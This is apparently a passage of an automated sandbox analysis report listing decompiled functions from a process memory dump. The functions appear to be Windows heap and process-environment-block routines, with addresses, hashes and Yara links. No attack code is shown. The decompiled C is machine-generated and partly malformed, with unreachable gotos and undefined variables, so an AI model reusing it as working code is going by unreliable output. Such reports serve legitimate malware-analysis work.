						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4968724 & 0x00000004;
							if(( *0x4968724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4968724; // 0x0
					return E04928DF1(__ebx, 0xc0000374, 0x4965890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                          0x04932076
                          0x04932078
                          0x0493207d
                          0x04932083
                          0x049320a4
                          0x049320aa
                          0x049320ac
                          0x049320b7
                          0x049320ba
                          0x049320bc
                          0x049320c9
                          0x049320c9
                          0x049320d0
                          0x049320d2
                          0x00000000
                          0x049320d2
                          0x049320be
                          0x049320c3
                          0x049320c5
                          0x049320c7
                          0x00000000
                          0x00000000
                          0x049320c7
                          0x049320bc
                          0x049320d4
                          0x04932085
                          0x04932085
                          0x049320a3
                          0x049320a3

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 768d0e8b4bc6bfc7a1ed63526e7874c04dcc539c37fb89a9a4be82f2731bb221
                          • Instruction ID: 95fa347feb60c6d6da80a5032a8a093fc779255bc546fbab0eb12ec3b6472f38
                          • Opcode Fuzzy Hash: 768d0e8b4bc6bfc7a1ed63526e7874c04dcc539c37fb89a9a4be82f2731bb221
                          • Instruction Fuzzy Hash: F8F0A02A41B2948AEF32BF3971113E12F98D7C6219B0A04F9D89017209C538AC8BEB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04948D34, Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          C-Code - Quality: 43%
                          			E04948D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x496d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04897D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                          0x04948d34
                          0x04948d43
                          0x04948d4b
                          0x04948d4e
                          0x04948d52
                          0x04948d5c
                          0x04948d6e
                          0x04948d5e
                          0x04948d67
                          0x04948d67
                          0x04948d79
                          0x04948d7a
                          0x04948d7c
                          0x04948d81
                          0x04948d94

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc858429fdfc02ba9e608ef7eb0fb0882f8f455ec412065f1b54b377928547b7
                          • Instruction ID: 89f44500460de4c8cde1c2787ea8f0bd62b31f9f35b74502cca0ea324e1e5bcd
                          • Opcode Fuzzy Hash: fc858429fdfc02ba9e608ef7eb0fb0882f8f455ec412065f1b54b377928547b7
                          • Instruction Fuzzy Hash: 33F09070E056489FDB04EBACD541EAE77B4EB44304F1085A9E915EB380EA74E9008795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B927A, Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          C-Code - Quality: 54%
                          			E048B927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E048BFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E048B92C6(_t11, _t14);
				}
				return _t11;
			}





                          0x048b9295
                          0x048b9299
                          0x048b929f
                          0x048b92aa
                          0x048b92ad
                          0x048b92ae
                          0x048b92af
                          0x048b92b0
                          0x048b92b4
                          0x048b92bb
                          0x048b92bb
                          0x048b92c5

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                          • Instruction ID: 4d96e91d0805159af637e332dd3c049e2e253021ce8dd0447a014d65759869fd
                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                          • Instruction Fuzzy Hash: BDE0E5722405002BE7119E09CC80B4337A99F82728F044578F6009E242C6E5EC0987E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04948CD6, Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 36%
                          			E04948CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x496d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04897D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                          0x04948ce5
                          0x04948ced
                          0x04948cf0
                          0x04948cfb
                          0x04948d0d
                          0x04948cfd
                          0x04948d06
                          0x04948d06
                          0x04948d18
                          0x04948d19
                          0x04948d1b
                          0x04948d20
                          0x04948d33

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 728344ea280d1c373f8891b4cba0a67bcfb41084537505a01d70f4757489848f
                          • Instruction ID: a08181b2c9c9afa324efb04305935a278a323cde80d3ed412d825a43047d65da
                          • Opcode Fuzzy Hash: 728344ea280d1c373f8891b4cba0a67bcfb41084537505a01d70f4757489848f
                          • Instruction Fuzzy Hash: D4F0E970A055489FDB04EBACD545DAE77B4EF45304F140669E515EB380EA34ED00C755
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0489746D, Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E0489746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0488EB70(__ecx, 0x49679a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E048B95D0();
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                          0x0489746d
                          0x0489746d
                          0x0489746d
                          0x04897471
                          0x04897488
                          0x048df92d
                          0x0489748e
                          0x04897491
                          0x04897495
                          0x048df937
                          0x048df93a
                          0x048df94e
                          0x048df953
                          0x048df956
                          0x048df956
                          0x04897495
                          0x00000000
                          0x04897488
                          0x04897473
                          0x04897478
                          0x0489747d
                          0x04897481
                          0x00000000
                          0x04897481
                          0x0489747d
                          0x0489747a
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5af17bdb1e26c7d7379ccf18fcb8e4c59194eb6c7be16894c54c0536e41822c2
                          • Instruction ID: cfe53694703684abbe7fb7f584a7986eb38e09c6b8c6b75ddbfc7be439eca64b
                          • Opcode Fuzzy Hash: 5af17bdb1e26c7d7379ccf18fcb8e4c59194eb6c7be16894c54c0536e41822c2
                          • Instruction Fuzzy Hash: E5F0B434A61948EEDF119B6CC840B79BBE1AF04318F084F55D552EB152F764BC009B86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04874F2E, Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E04874F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E049488F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0489C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4851030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                          0x04874f2e
                          0x04874f34
                          0x04874f38
                          0x048d0b85
                          0x048d0b85
                          0x048d0b89
                          0x048d0b9a
                          0x048d0b9a
                          0x048d0b9f
                          0x00000000
                          0x048d0b9f
                          0x048d0b94
                          0x048d0b98
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d0b98
                          0x04874f3e
                          0x04874f48
                          0x00000000
                          0x04874f6e
                          0x00000000
                          0x04874f70

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 668c4226bd481d3ed818086af3526a28868ecc493e16719b27d37f3aec4e9779
                          • Instruction ID: db2777e92d7c3cc424831b9ee92cd8adaa5b39f93a11aeead8ea30978ed5eef4
                          • Opcode Fuzzy Hash: 668c4226bd481d3ed818086af3526a28868ecc493e16719b27d37f3aec4e9779
                          • Instruction Fuzzy Hash: D2F0E23292BA948FE771DB58C144B22B7D4AF027BCF444E74D805C7A20C724FC44C640
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04948B58, Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 36%
                          			E04948B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x496d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04897D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                          0x04948b67
                          0x04948b6f
                          0x04948b72
                          0x04948b7d
                          0x04948b8f
                          0x04948b7f
                          0x04948b88
                          0x04948b88
                          0x04948b9a
                          0x04948b9b
                          0x04948b9d
                          0x04948ba2
                          0x04948bb5

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cf41df8bc53ed350be58a79d33c364ec5c9f91ed67dc1855b698f6c1d6b5dd2
                          • Instruction ID: 9298050e6231384b3d52d36a6e81861a9c02e3bacfa1a8a469ebf7b8656e19e1
                          • Opcode Fuzzy Hash: 4cf41df8bc53ed350be58a79d33c364ec5c9f91ed67dc1855b698f6c1d6b5dd2
                          • Instruction Fuzzy Hash: 8FF054B0A146589FDB04EBA8D505E6E77A4EB44304F140969E915DB380EA74E900C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AA44B, Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048AA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4967b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E048BFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                          0x048aa44b
                          0x048aa453
                          0x048aa472
                          0x048aa476
                          0x00000000
                          0x048aa493
                          0x048aa47a
                          0x048aa47f
                          0x048aa486
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2403918267e1de00d506a57725b8f8ae2a2ad7ebc82b6acd7f10390939c38b22
                          • Instruction ID: fcf2c78a0cc0a2386039e5b243418e4eec9af12fc0cc32ca8fcb692fba5b9504
                          • Opcode Fuzzy Hash: 2403918267e1de00d506a57725b8f8ae2a2ad7ebc82b6acd7f10390939c38b22
                          • Instruction Fuzzy Hash: 9BE02272A02820ABE2124A58AC00F66739DDBD0A08F090A38F604E7610D6A8ED12C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487F358, Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E0487F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E048AF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04894620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                          0x0487f35d
                          0x0487f361
                          0x0487f367
                          0x0487f372
                          0x0487f38c
                          0x0487f38c
                          0x0487f394

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                          • Instruction ID: e6999fdfb33d498cafe18fe53767f41407ddf974acc8b75b0a3ce607bf82f207
                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                          • Instruction Fuzzy Hash: 48E0D832A41118BBEB3196DD9D05F5ABBACDB44B60F040755FB04D7150D5A4ED00C6D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488FF60, Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0488FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x48511a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E049488F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04890050(_t14);
				}
			}










                          0x0488ff66
                          0x0488ff6b
                          0x00000000
                          0x0488ff8f
                          0x00000000
                          0x0488ff8f

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fbb4f562823eb7fd0171863503a2e8db37c276ba4ac5295f2a3f1c314fc6995
                          • Instruction ID: 644b20389fdaa3ac42461e9900d491a21a3f69a83e881a93c4081d6e472f8868
                          • Opcode Fuzzy Hash: 1fbb4f562823eb7fd0171863503a2e8db37c276ba4ac5295f2a3f1c314fc6995
                          • Instruction Fuzzy Hash: ABE0DFB07052049FEB34FB56D040F2537989B82729F198E5DEB08CB103CE21FC80C24A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 049041E8, Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E049041E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x49508f0);
				_t5 = E048CD08C(__ebx, __edi, __esi);
				if( *0x49687ec == 0) {
					E0488EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x49687ec == 0) {
						 *0x49687f0 = 0x49687ec;
						 *0x49687ec = 0x49687ec;
						 *0x49687e8 = 0x49687e4;
						 *0x49687e4 = 0x49687e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04904248();
				}
				return E048CD0D1(_t5);
			}





                          0x049041e8
                          0x049041ea
                          0x049041ef
                          0x049041fb
                          0x04904206
                          0x0490420b
                          0x04904216
                          0x0490421d
                          0x04904222
                          0x0490422c
                          0x04904231
                          0x04904231
                          0x04904236
                          0x0490423d
                          0x0490423d
                          0x04904247

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3641ac46af3fff0e05802eda40654520b56a525d0d5a2bb8ee3c24e821fb189
                          • Instruction ID: d8b3f69dca42614d5a8f23eb8ea3d89ffc2c6a559ac1e492c6d6a155fc9fd3cb
                          • Opcode Fuzzy Hash: f3641ac46af3fff0e05802eda40654520b56a525d0d5a2bb8ee3c24e821fb189
                          • Instruction Fuzzy Hash: 85F0F874956700DEEB60FF6E95087143AE4EBC4316F90857ED10086A84C778A840DF01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0492D380, Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0492D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0487E8B0(__ecx, _a4, 0xfff);
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                          0x0492d38a
                          0x0492d39b
                          0x0492d3b1
                          0x00000000
                          0x0492d3b6
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                          • Instruction ID: 095575d2b71f3bf484da581eaf43b351f104e878bc0b664fc35aa0a12feb0464
                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                          • Instruction Fuzzy Hash: 85E0C231280618FBEB225E48CD00FBA7B5ADB407A8F104531FE089B690C6B9FC91E6C4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AA185, Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048AA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x49667e4 >= 0xa) {
					if(_t5 < 0x4966800 || _t5 >= 0x4966900) {
						return L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04890010(0x49667e0, _t5);
				}
			}





                          0x048aa190
                          0x048aa1a6
                          0x048aa1c2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048aa192
                          0x048aa192
                          0x048aa19f
                          0x048aa19f

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 902f68ad83593cf5864bc53dfd6ad5fe1203a4aafc8964064f34ce2193414b3f
                          • Instruction ID: dd9a3af5a6d7e21169cd40328ddec6f25dbc826fae2e7c9a763b10361e3564df
                          • Opcode Fuzzy Hash: 902f68ad83593cf5864bc53dfd6ad5fe1203a4aafc8964064f34ce2193414b3f
                          • Instruction Fuzzy Hash: C2D02E32220600BAFB2C2B14A818B212292E7C0708F304E2CF107DADA0DEE4FCF0D189
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A16E0, Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048A16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E048A1710(0x49667e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04894620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                          0x048a16e8
                          0x048a16ef
                          0x048a16f3
                          0x048a16fe
                          0x00000000
                          0x048a1700
                          0x048a170d
                          0x048a170d
                          0x048a16f2
                          0x048a16f2
                          0x048a16f2
                          0x048a16f2

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ef285ae1fa68c2dbc2c273c22708098df4b079eebf5162d4129f9586fecef91
                          • Instruction ID: 9dc80c2566e759a52c0435739afa56bfad390366b854e1aeb7ef8ac8e288500a
                          • Opcode Fuzzy Hash: 9ef285ae1fa68c2dbc2c273c22708098df4b079eebf5162d4129f9586fecef91
                          • Instruction Fuzzy Hash: 66D0A77115020052FE2D5B149808B142291DBC0B89F3C096CF107D94D0CFE0FCB2E44C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A35A1, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048A35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0488EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                          0x048a35a1
                          0x048a35a1
                          0x048a35a5
                          0x048a35ab
                          0x048a35ab
                          0x048a35b5
                          0x00000000
                          0x048a35c1
                          0x048a35b7

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                          • Instruction ID: 4c3dddbb58827b2c52dd8301a0a65ea8ad500fd98d611c3543f8dc4302125f79
                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                          • Instruction Fuzzy Hash: FAD0A931901184BAFB01AF1CC21876833B2BB00308F582A698802C6852E3FA6A2AD602
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488AAB0, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0488AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                          0x0488aab6
                          0x0488aabb
                          0x048da442
                          0x00000000
                          0x048da448
                          0x048da454
                          0x048da454
                          0x0488aac1
                          0x0488aac1
                          0x0488aac6
                          0x0488aac6

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                          • Instruction ID: fdea421c8192b389c7a8bc97146517e2879cf7e6a5463af809a52f8b183abffe
                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                          • Instruction Fuzzy Hash: 69D0E939352980CFD71ADF1DC554B1573A5BB44B44FD50994E501CBB61E62CE984CA00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048FA537, Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048FA537(intOrPtr _a4, intOrPtr _a8) {

				return L04898E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                          0x048fa553

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
